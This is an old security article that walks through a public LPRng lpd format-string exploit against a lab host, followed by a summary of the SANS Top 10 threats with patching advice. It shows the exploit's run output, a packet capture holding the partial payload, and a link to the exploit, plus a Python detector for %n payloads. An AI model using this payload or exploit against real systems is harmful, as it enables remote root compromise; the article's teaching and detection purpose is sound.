In this article, we will cover the exploits run by crackers. We will also look at the SANS 10 Most Critical Internet Security Threats list.

Exploits

Reconnaissance is vital in figuring out what is open and what is closed. The next step for a cracker is to actually break in to a computer network. Crackers do this by exploiting weaknesses in operating-system services. There are many exploits out there, and finding the right one can be a headache. Not all exploits are created equal: most of them are operating-system dependent. Just because there is a line printer exploit for Linux doesn't mean it would work on Solaris, and vice versa.

To help explain what an exploit is and what it looks like while it is being executed, I have included in this article the output from an exploit and some of the packets involved. First, a little background on the exploit I decided to run. In late 2000, probing activity increased on TCP port 515 (the line printer port). This was related to a format-string vulnerability in the LPRng line printer daemon (lpd) shipped with Red Hat 7.0 (CVE-2000-0917; CERT advisory CA-2000-22). At the time of this writing, I am still seeing many probes for this service on my firewall. If you want to see the exploit I used, it can be found at http://www.netcat.it. Here are the listings promised, along with some play-by-play for each:

    +++ www.netcat.it remote exploit for LPRng/lpd
    +++ Exploit information
    +++ Victim: 192.168.1.25
    +++ Type: 0 - RedHat 7.0 - Guinesss
    +++ Eip address: 0xbffff3ec
    +++ Shellcode address: 0xbffff7f2
    +++ Position: 300
    +++ Alignment: 2
    +++ Offset 0
    +++ Attacking 192.168.1.25 with our format string
    +++ Brute force man, relax and enjoy the ride ;>

From this output, we know that the exploit is attacking a Red Hat 7.0 line printer daemon ("Type: 0 - RedHat 7.0 - Guinesss"; Guinness was the release codename). Want to see how tcpdump views this attack?
    18:34:19.991789 > 192.168.1.5.2894 > 192.168.1.25.printer: S 4221747912:4221747912(0) win 32120 <mss 1460,sackOK,timestamp 4058996 0,nop,wscale 0> (DF) (ttl 64, id 11263)
        4500 003c 2bff 4000 4006 8b4e c0a8 0105
        c0a8 0119 0b4e 0203 fba2 c2c8 0000 0000
        a002 7d78 8bb1 0000 0204 05b4 0402 080a
        003d ef74 0000 0000 0103 0300
    18:34:19.993434 < 192.168.1.25.printer > 192.168.1.5.2894: S 397480959:397480959(0) ack 4221747913 win 32120 <mss 1460,sackOK,timestamp 393475 4058996,nop,wscale 0> (DF) (ttl 64, id 3278)
        4500 003c 0cce 4000 4006 aa7f c0a8 0119
        c0a8 0105 0203 0b4e 17b1 13ff fba2 c2c9
        a012 7d78 5ee7 0000 0204 05b4 0402 080a
        0006 0103 003d ef74 0103 0300
    18:34:19.993514 > 192.168.1.5.2894 > 192.168.1.25.printer: . 1:1(0) ack 1 win 32120 <nop,nop,timestamp 4058996 393475> (DF) (ttl 64, id 11264)
        4500 0034 2c00 4000 4006 8b55 c0a8 0105
        c0a8 0119 0b4e 0203 fba2 c2c9 17b1 1400
        8010 7d78 8dac 0000 0101 080a 003d ef74
        0006 0103
    18:34:19.999662 < 192.168.1.25.printer > 192.168.1.5.2894: P 1:31(30) ack 1 win 32120 <nop,nop,timestamp 393476 4058996> (DF) (ttl 64, id 3279)
        4500 0052 0ccf 4000 4006 aa68 c0a8 0119
        c0a8 0105 0203 0b4e 17b1 1400 fba2 c2c9
        8018 7d78 3e5b 0000 0101 080a 0006 0104
        003d ef74 6c70 643a 203a 204d 616c 666f
        726d 6564 2066 726f 6d20 6164 6472 6573
        730a
    18:34:19.999686 > 192.168.1.5.2894 > 192.168.1.25.printer: . 1:1(0) ack 31 win 32120 <nop,nop,timestamp 4058997 393476> (DF) (ttl 64, id 11265)
        4500 0034 2c01 4000 4006 8b54 c0a8 0105
        c0a8 0119 0b4e 0203 fba2 c2c9 17b1 141e
        8010 7d78 8d8c 0000 0101 080a 003d ef75
        0006 0104
    18:34:20.000863 < 192.168.1.25.printer > 192.168.1.5.2894: F 31:31(0) ack 1 win 32120 <nop,nop,timestamp 393476 4058997> (DF) (ttl 64, id 3280)
        4500 0034 0cd0 4000 4006 aa85 c0a8 0119
        c0a8 0105 0203 0b4e 17b1 141e fba2 c2c9
        8011 7d78 8d8b 0000 0101 080a 0006 0104
        003d ef75
    18:34:20.000878 > 192.168.1.5.2894 > 192.168.1.25.printer: . 1:1(0) ack 32 win 32120 <nop,nop,timestamp 4058997 393476> (DF) (ttl 64, id 11266)
        4500 0034 2c02 4000 4006 8b53 c0a8 0105
        c0a8 0119 0b4e 0203 fba2 c2c9 17b1 141f
        8010 7d78 8d8b 0000 0101 080a 003d ef75
        0006 0104
    18:34:20.049095 > 192.168.1.5.2894 > 192.168.1.25.printer: P 1:424(423) ack 32 win 32120 <nop,nop,timestamp 4059002 393476> (DF) (ttl 64, id 11267)
        4500 01db 2c03 4000 4006 89ab c0a8 0105
        c0a8 0119 0b4e 0203 fba2 c2c9 17b1 141f
        8018 7d78 54c5 0000 0101 080a 003d ef7a
        0006 0104 4242 f0ff ffbf f1ff ffbf f2ff
        ffbf f3ff ffbf 5858 5858 5858 5858 5858
        5858 5858 5858 5858 252e 3137 3675 2533
        3030 246e 252e 3133 7525 3330 3124 6e25
        2e32 3533 7525 3330 3224 6e25 2e31 3932

Let's look at what is happening here. (The > or < right after each timestamp is tcpdump's direction marker relative to the capturing machine, here the attacker.) First, 192.168.1.5 (the attacker, from ephemeral port 2894) and 192.168.1.25 (the victim, port 515, which tcpdump prints as "printer") complete the typical TCP three-way handshake: SYN, SYN/ACK, ACK. Next, the daemon pushes 30 bytes back to the attacker and immediately follows them with a FIN; those bytes (6c70 643a ...) are the ASCII text "lpd: : Malformed from address", the daemon's complaint about the connection. Finally, 192.168.1.5 pushes 423 bytes of data to 192.168.1.25. tcpdump cut the dump at its capture length, so only the first 76 bytes of that payload are shown, but they are enough to see the anatomy of a format-string attack: two alignment bytes ("BB", matching "Alignment: 2" in the exploit banner), four consecutive little-endian addresses, 0xbffffff0 through 0xbffffff3 (the stack region on Linux/x86), a run of "X" padding, and then the text %.176u%300$n%.13u%301$n%.253u%302$n%.192..., in which each %.<width>u pads the number of characters printed so far to a chosen value and each %<pos>$n writes that count through the pointer the daemon finds at argument position 300, 301, 302 (the "Position: 300" in the banner); the dump ends in the middle of the fourth such pair. The exploit repeats this, adjusting the addresses, until it brute-forces the right values and the daemon jumps into the shellcode. When this exploit worked, 192.168.1.25 provided me with a shell (not that I needed it), and I could do whatever I wanted.

Exploits are the way crackers break into systems. To protect yourself against them, you will have to keep your operating system up to date with patches. (This goes for all systems.) For this particular hole, that means the fixed LPRng packages from Red Hat; beyond that, a host that does not need to accept print jobs from the network should not have lpd listening on port 515 at all, and your firewall should block inbound 515 regardless, which also takes care of the probes.

The SANS Top 10

The SANS Top 10 Most Critical Internet Security Threats is a list of the most commonly exploited vulnerabilities found on computer networks. What makes this list so valuable is that the SANS Institute provides the related CVE (Common Vulnerabilities and Exposures) entries for each item, so that a person can do more research if necessary. The list was compiled by SANS with the help of many security experts and the security community. The CVE database can be found at http://www.cve.mitre.org/. To read more on the SANS Top 10, visit http://www.sans.org/topten.htm.
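Before going through the Top 10 entries one by one, here is a closer look at the LPRng capture above, as an added example; this Python is not from the article or from the netcat.it exploit. It decodes two of the tcpdump -x hex dumps (the daemon's 30-byte reply and the attacker's 423-byte push) back into their TCP payloads and flags the two marks of a format-string attack, %n directives and pointer-looking values. The hex is copied verbatim from the capture; the 0xbf000000-0xbfffffff stack range is an assumption about Linux/x86 of that era, and the field names are this example's own.

```python
"""Decode tcpdump -x hex dumps into TCP payloads and flag format-string markers.

Added example for this article; it is not the netcat.it exploit or anything
from the article itself.  The two hex dumps are copied from the capture above
exactly as tcpdump printed them; everything else (field names, the stack
address range) is this example's own assumption.
"""
import re
import struct

# From the capture: the daemon's reply, P 1:31(30), 192.168.1.25.515 -> 192.168.1.5.2894.
REPLY_PACKET_HEX = """
4500 0052 0ccf 4000 4006 aa68 c0a8 0119 c0a8 0105 0203 0b4e 17b1 1400 fba2 c2c9
8018 7d78 3e5b 0000 0101 080a 0006 0104 003d ef74 6c70 643a 203a 204d 616c 666f
726d 6564 2066 726f 6d20 6164 6472 6573 730a
"""

# From the capture: the client's P 1:424(423) carrying the exploit string.
# tcpdump printed only the first 128 bytes of the 475-byte datagram.
EXPLOIT_PACKET_HEX = """
4500 01db 2c03 4000 4006 89ab c0a8 0105 c0a8 0119 0b4e 0203 fba2 c2c9 17b1 141f
8018 7d78 54c5 0000 0101 080a 003d ef7a 0006 0104 4242 f0ff ffbf f1ff ffbf f2ff
ffbf f3ff ffbf 5858 5858 5858 5858 5858 5858 5858 5858 5858 252e 3137 3675 2533
3030 246e 252e 3133 7525 3330 3124 6e25 2e32 3533 7525 3330 3224 6e25 2e31 3932
"""

# printf conversion: %[argpos$][flags][width][.precision][length]conversion.
# "%300$n" picks argument 300 by position and writes through it; that form
# has no business in a print request.
DIRECTIVE = re.compile(
    rb"%(?:\d+\$)?[-+ #0]*(?:\d+|\*)?(?:\.(?:\d+|\*))?"
    rb"(?:hh|h|ll|l|L|q|j|z|t)?[diouxXeEfFgGaAcspn%]"
)

# Assumption: a Linux 2.x/x86 process stack sits just below 0xc0000000, so a
# little-endian 32-bit value with 0xbf in its top byte looks like a stack address.
STACK_LO, STACK_HI = 0xBF000000, 0xBFFFFFFF


def parse_tcp(hexdump: str) -> dict:
    """Split one IPv4/TCP datagram, given as tcpdump -x hex words, into fields."""
    raw = bytes.fromhex("".join(hexdump.split()))
    if raw[0] >> 4 != 4 or raw[9] != 6:
        raise ValueError("not an IPv4/TCP datagram")
    ihl = (raw[0] & 0x0F) * 4                       # IP header length in bytes
    total_len = struct.unpack("!H", raw[2:4])[0]    # length the sender declared
    tcp = raw[ihl:]
    sport, dport = struct.unpack("!HH", tcp[:4])
    doff = (tcp[12] >> 4) * 4                       # TCP header length in bytes
    flags = tcp[13]
    payload = tcp[doff:]
    declared = total_len - ihl - doff
    return {
        "src": "%d.%d.%d.%d" % tuple(raw[12:16]),
        "dst": "%d.%d.%d.%d" % tuple(raw[16:20]),
        "sport": sport,
        "dport": dport,
        "psh": bool(flags & 0x08),
        "fin": bool(flags & 0x01),
        "payload": payload,
        "declared_payload_len": declared,
        # True when the capture length cut the dump short of what was sent.
        "truncated": len(payload) < declared,
    }


def format_string_indicators(payload: bytes) -> dict:
    """Report printf directives, %n writes and stack-looking pointers in a payload."""
    directives = [m.group(0) for m in DIRECTIVE.finditer(payload)]
    writes = [d for d in directives if d.endswith(b"n")]
    pointers = []
    for off in range(len(payload) - 3):           # every 4-byte window, any alignment
        value = struct.unpack_from("<I", payload, off)[0]
        if STACK_LO <= value <= STACK_HI:
            pointers.append(value)
    return {
        "directives": directives,
        "write_directives": writes,
        "pointers": pointers,
        "suspicious": bool(writes),
    }


if __name__ == "__main__":
    for name, dump in (("reply", REPLY_PACKET_HEX), ("exploit", EXPLOIT_PACKET_HEX)):
        pkt = parse_tcp(dump)
        ind = format_string_indicators(pkt["payload"])
        print("%s: %s:%d -> %s:%d, %d of %d payload bytes captured%s"
              % (name, pkt["src"], pkt["sport"], pkt["dst"], pkt["dport"],
                 len(pkt["payload"]), pkt["declared_payload_len"],
                 " (truncated)" if pkt["truncated"] else ""))
        print("  payload:", pkt["payload"])
        print("  %n writes:", ind["write_directives"])
        print("  stack pointers:", [hex(p) for p in ind["pointers"]])
        print("  suspicious:", ind["suspicious"])
```

Run it and the reply decodes to the plain text "lpd: : Malformed from address" with nothing flagged, while the exploit push shows the two "B" bytes, the four stack addresses 0xbffffff0 through 0xbffffff3, the "X" padding and the %300$n, %301$n and %302$n writes. Running the same check over the payload of every connection to port 515 is a cheap detection rule for this whole family of attacks; the declared-versus-captured length also tells you when the dump was cut short and you are not seeing the whole payload.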
The first exploit listed on the Top 10 is BIND. BIND is the program most DNS servers run (it resolves names to addresses) and is used throughout the Internet. In the past couple of years, major holes have been found in many versions of BIND. It is vital for anyone who runs BIND to keep up on the latest vulnerabilities. On Jan. 29, 2001, Network Associates Incorporated announced that it had discovered more vulnerabilities in BIND version 4 and BIND version 8. Patches have been released and can be downloaded from your operating system vendor's Web site. If you would like to read the paper released by NAI, you can get it here: http://www.pgp.com/aboutus/press/pr_template.asp?PR=/PressMedia/01282001-A.asp&Sel=900, or you can read the CERT advisory at http://www.cert.org/advisories/CA-2001-02.html.

The second exploit in the SANS Top 10 is vulnerable CGI programs. These have been around for years and are behind most of the Web site break-ins that receive mainstream attention. Many Web servers install sample CGI programs in cgi-bin; several of these are vulnerable and let a malicious user run commands on the server with the Web server's privileges, and sometimes as "root". When an attacker obtains that level of access, he can do as he pleases (including changing the Web site). I have provided some links for more information on CGI-BIN attacks. This list is not comprehensive; please dig a little further if you think you are vulnerable. More information on CGI-BIN attacks can be found at http://www.cert.org/advisories/CA-1997-24.html, http://www.cert.org/advisories/CA-1996-11.html, or http://www.cert.org/advisories/CA-1997-07.html.

The third exploit is vulnerable Remote Procedure Calls (RPCs). RPC lets a program call procedures on another machine across the network; on UNIX the portmapper (port 111) tells clients which port each RPC service listens on, so one query to it gives a cracker an inventory of your RPC services. Most vendors provide patches to help tighten down RPC services. Nevertheless, the best policy regarding this service is, if you don't need it, then kill it. You can run ps -ef | grep rpc, find the Process ID (PID), and then run kill PID (use kill -9 PID only if the process will not exit on a plain kill).
You can also disable RPC services at startup on most UNIX operating systems by renaming the startup script (located under /etc/rc.d/) from an S (start) prefix to a K (kill) prefix; killing the process alone only lasts until the next reboot. You can find out what RPC programs are registered by running rpcinfo -p. More information on RPC attacks can be found at http://www.cert.org/incident_notes/IN-99-04.html.

The fourth exploit on the SANS Top 10 list is the Remote Data Service (RDS) security hole in IIS. (To be honest, I am surprised Microsoft doesn't have more vulnerabilities in the Top 10.) I can sum up dealing with this exploit really quickly: patch your IIS, and if you do not use RDS, remove the /msadc virtual directory that exposes it. More information on the RDS security hole can be found at http://www.wiretrip.net/rfp/p/doc.asp?id=29&iface=2.

The fifth exploit is vulnerable sendmail and MIME attacks. These vulnerabilities involve buffer overflows as well as pipe attacks, and because sendmail runs as root they enable immediate root compromise. There are a couple of ways to secure these problem areas. The first is to keep your sendmail (or whatever mail server you run) patched. If the machine does not need to receive mail from the network, do not run sendmail as a listening daemon (follow the same procedure as spelled out for RPC). More information on sendmail security holes can be found at http://www.cert.org/advisories/CA-97.05.sendmail.html.

The sixth exploit is vulnerable sadmind and mountd. sadmind is the Solstice AdminSuite daemon on Solaris, and the mountd hole affected the NFS mount daemon shipped with many Linux distributions, so this entry applies to Linux machines as well as Solaris machines; both daemons run as root, so a successful attack is a root compromise. For more information on the sadmind and mountd security holes, visit http://www.cert.org/advisories/CA-99-16-sadmind.html or http://www.cert.org/advisories/CA-1998.12.mountd.html.

The seventh exploit in the Top 10 is global file sharing over NetBIOS (ports 135-139). This is probably the biggest security problem users have if they are connected by cable modem or DSL. Most do not understand the concept of file sharing and leave it enabled on the interface that faces the Internet. Another problem is Napster. Although Napster is not listed here, it does require people to share directories, and that can lead to sharing more than necessary.
How do we correct it? These suggestions are from the SANS site http://www.sans.org/topten.htm:

A. When sharing mounted drives, ensure only required directories are shared.
B. For added security, allow sharing only to specific IP addresses, because DNS names can be spoofed.
C. For Windows systems, ensure all shares are protected with strong passwords.
D. For Windows NT systems, prevent anonymous enumeration of users, groups, system configuration and Registry keys via the "null session" connection. Block inbound connections to the NetBIOS Session Service (TCP 139) at the router or the NT host. Consider implementing the RestrictAnonymous Registry key for Internet-connected hosts in standalone or non-trusted domain environments.

The eighth exploit is weak passwords. Need I say any more? In any form of risk assessment, one of the most common vulnerabilities I see is weak passwords. When coming up with a password, remember to follow these simple guidelines:

- Make sure that the password is at least eight characters long.
- Make sure that the password mixes upper- and lowercase letters, numbers and special characters.
- Pick a password that is not in a dictionary; password-guessing tools try dictionary words with digits and symbols tacked on, so those do not count either.

For more information on password strength, visit http://www.cert.org/tech_tips/passwd_file_protection.html.

The ninth exploit is IMAP and POP buffer overflow vulnerabilities or incorrect configuration. Again, the best way to secure yourself from these attacks is to disable the service if you do not need it. Also, apply the latest patches (if you need to run the service). For more information on IMAP and POP security, please visit http://www.cert.org/advisories/CA-1998.09.imapd.html, http://www.cert.org/advisories/CA-1998.08.qpopper_vul.html, or http://www.cert.org/advisories/CA-1997.09.imap_pop.html.

The final exploit in the SANS Top 10 is default SNMP community strings left set to "public" and "private". Like weak passwords, this vulnerability can be controlled by basic administration: change the community strings on every device, and filter SNMP (UDP 161) at the border so that only your management stations can reach it.
For more information on SNMP and community strings, see http://www.cisco.com/univercd/cc/td/doc/cisintwk/ito_doc/snmp.htm#xtocid210315. Keep in mind that these are not the only vulnerabilities out there. A cracker can use any exploit he has in his bag of tricks against you and your network.
Disclaimer
1) E-articles is not responsible for the information contained in this article or for any copyright infringements by authors and writers. E-articles is a free information resource. If you suspect this article of any copyright infringement, please read the terms of service and contact us to investigate the problem.
2) E-articles is not responsible for inaccuracies, falsehoods, or any other types of misinformation this article may contain and will not be liable for any loss or damage suffered by a user through the user's reliance on the information gained here.